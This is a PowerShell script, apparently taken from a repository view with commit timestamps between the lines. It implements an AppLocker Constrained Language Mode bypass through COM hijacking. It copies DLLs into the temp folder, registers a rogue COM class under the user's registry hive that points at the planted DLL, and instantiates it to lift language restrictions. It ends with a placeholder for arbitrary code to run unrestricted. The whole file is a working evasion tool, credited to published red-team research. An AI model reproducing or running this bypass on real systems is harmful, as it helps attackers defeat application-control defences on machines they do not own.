2019-06-21 04:52:38 +02:00
|
|
|
|
|
|
|
|
|
# -------------------------
|
|
|
|
|
$comName = "ClmDisableDll"
|
|
|
|
|
$comDescription = "CLM Disable COM"
|
|
|
|
|
|
|
|
|
|
$srcDllPath = '.\ClmDisableDll.dll'
|
|
|
|
|
$dstDllPath = "$($Env:Temp)\ClmDisableDll.dll"
|
|
|
|
|
|
|
|
|
|
$srcAssemblyPath = '.\ClmDisableAssembly.dll'
|
|
|
|
|
$dstAssemblyPath = "$($Env:Temp)\ClmDisableAssembly.dll"
|
|
|
|
|
|
|
|
|
|
$guid = "{394aaa50-684e-4870-911a-d045293b3b13}"
|
|
|
|
|
# -------------------------
|
|
|
|
|
|
|
|
|
|
function Bypass-CLM
|
|
|
|
|
{
|
|
|
|
|
param(
|
|
|
|
|
[switch]$RemoveComWhenFinished
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
$ErrorActionPreference = "SilentlyContinue"
|
|
|
|
|
|
|
|
|
|
function Create-COM {
|
|
|
|
|
param(
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$comName,
|
|
|
|
|
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$comDescription,
|
|
|
|
|
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$dllPath,
|
|
|
|
|
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$guid
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
# Obtains current user SID, can't use System.Security.Principal.NTAccount
|
|
|
|
|
# type because we are in Constrained Language Mode
|
|
|
|
|
$sid = (whoami /user | select-string -Pattern "(S-1-5[0-9-]+)" -all | select -ExpandProperty Matches).value
|
|
|
|
|
|
|
|
|
|
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS
|
|
|
|
|
$key = 'HKU:\{0}_classes' -f $sid
|
|
|
|
|
|
|
|
|
|
# Adding our own InProcServer32
|
|
|
|
|
$key = 'HKU:\{0}_classes\CLSID\' -f $sid
|
|
|
|
|
New-Item -Path $key -Name $guid
|
|
|
|
|
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, $guid
|
|
|
|
|
New-Item -Path $key -Name 'InProcServer32'
|
|
|
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $comDescription -PropertyType String -Force
|
|
|
|
|
$key = 'HKU:\{0}_classes\CLSID\{1}\InProcServer32' -f $sid, $guid
|
|
|
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $dllPath -PropertyType String -Force
|
|
|
|
|
New-ItemProperty -Path $key -Name 'ThreadingModel' -Value "Apartment" -PropertyType String -Force
|
|
|
|
|
|
|
|
|
|
# Registering COM's ProgID / shortname
|
|
|
|
|
$key = 'HKU:\{0}_classes' -f $sid
|
|
|
|
|
New-Item -Path $key -Name $comName
|
|
|
|
|
$key = 'HKU:\{0}_classes\{1}' -f $sid, $comName
|
|
|
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $comDescription -PropertyType String -Force
|
|
|
|
|
New-Item -Path $key -Name 'CLSID'
|
|
|
|
|
$key = 'HKU:\{0}_classes\{1}\CLSID' -f $sid, $comName
|
|
|
|
|
New-ItemProperty -Path $key -Name '(Default)' -Value $guid -PropertyType String -Force
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
function Remove-COM {
|
|
|
|
|
param(
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$comName,
|
|
|
|
|
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$guid
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
$sid = (whoami /user | select-string -Pattern "(S-1-5[0-9-]+)" -all | select -ExpandProperty Matches).value
|
|
|
|
|
|
|
|
|
|
New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS | Out-Null
|
|
|
|
|
$key = 'HKU:\{0}_classes\{1}' -f $sid, $comName
|
|
|
|
|
Remove-Item -Path $key -Recurse | Out-Null
|
|
|
|
|
|
|
|
|
|
$key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, $guid
|
|
|
|
|
Remove-Item -Path $key -Recurse | Out-Null
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
function Invoke-PS {
|
|
|
|
|
param(
|
|
|
|
|
[Parameter(Mandatory = $true)]
|
|
|
|
|
[string]$Commands
|
|
|
|
|
)
|
|
|
|
|
|
|
|
|
|
$Runspace = [runspacefactory]::CreateRunspace()
|
|
|
|
|
$posh = [powershell]::Create()
|
|
|
|
|
$posh.runspace = $Runspace
|
|
|
|
|
$Runspace.Open()
|
|
|
|
|
|
|
|
|
|
[void]$posh.AddScript($Commands)
|
|
|
|
|
$posh.Invoke()
|
|
|
|
|
$posh.Dispose() | Out-Null
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
|
|
|
|
|
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
|
|
|
|
|
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
|
2021-10-24 23:11:42 +02:00
|
|
|
|
Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
|
2019-06-21 04:52:38 +02:00
|
|
|
|
Write-Host "`t-----`n"
|
|
|
|
|
|
|
|
|
|
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"
|
|
|
|
|
|
|
|
|
|
Copy-Item $srcDllPath $dstDllPath -Force
|
|
|
|
|
Copy-Item $srcAssemblyPath $dstAssemblyPath -Force
|
|
|
|
|
|
|
|
|
|
Write-Host "[.] Step 1. Creating custom COM object."
|
|
|
|
|
|
|
|
|
|
Create-COM -ComName $comName -ComDescription $comDescription -DllPath $dstDllPath -Guid $guid | Out-Null
|
|
|
|
|
|
|
|
|
|
Write-Host "[.] Step 2. Invoking it ($comName)..."
|
|
|
|
|
|
|
|
|
|
Write-Host "`tPowershell runspace Thread ID: $([appdomain]::GetCurrentThreadId())"
|
|
|
|
|
try
|
|
|
|
|
{
|
|
|
|
|
New-Object -ComObject $comName -erroraction 'silentlycontinue' | Out-Null
|
|
|
|
|
}
|
|
|
|
|
catch
|
|
|
|
|
{
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
if($RemoveComWhenFinished)
|
|
|
|
|
{
|
|
|
|
|
Write-Host "[.] Removing registered COM object."
|
|
|
|
|
Remove-COM -ComName $comName -Guid $guid
|
|
|
|
|
}
|
|
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
Write-Host "`n============"
|
|
|
|
|
Write-Host -ForegroundColor Yellow "`nUse below command to disable CLM on Demand (ignore errors):"
|
|
|
|
|
Write-Host "`n`tPS> " -NoNewLine
|
|
|
|
|
Write-Host -ForegroundColor Green "New-Object -ComObject $comName"
|
|
|
|
|
Write-Host "`n============`n"
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
#############################################################
|
|
|
|
|
#
|
|
|
|
|
# PUT YOUR CODE BELOW THAT IS GOING TO BE RUN IN CLM DISABLED
|
|
|
|
|
#
|
|
|
|
|
|
|
|
|
|
Write-Host "`n[+] Finished. CLM status: $($ExecutionContext.SessionState.LanguageMode)"
|
|
|
|
|
|
|
|
|
|
#############################################################
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
Bypass-CLM
|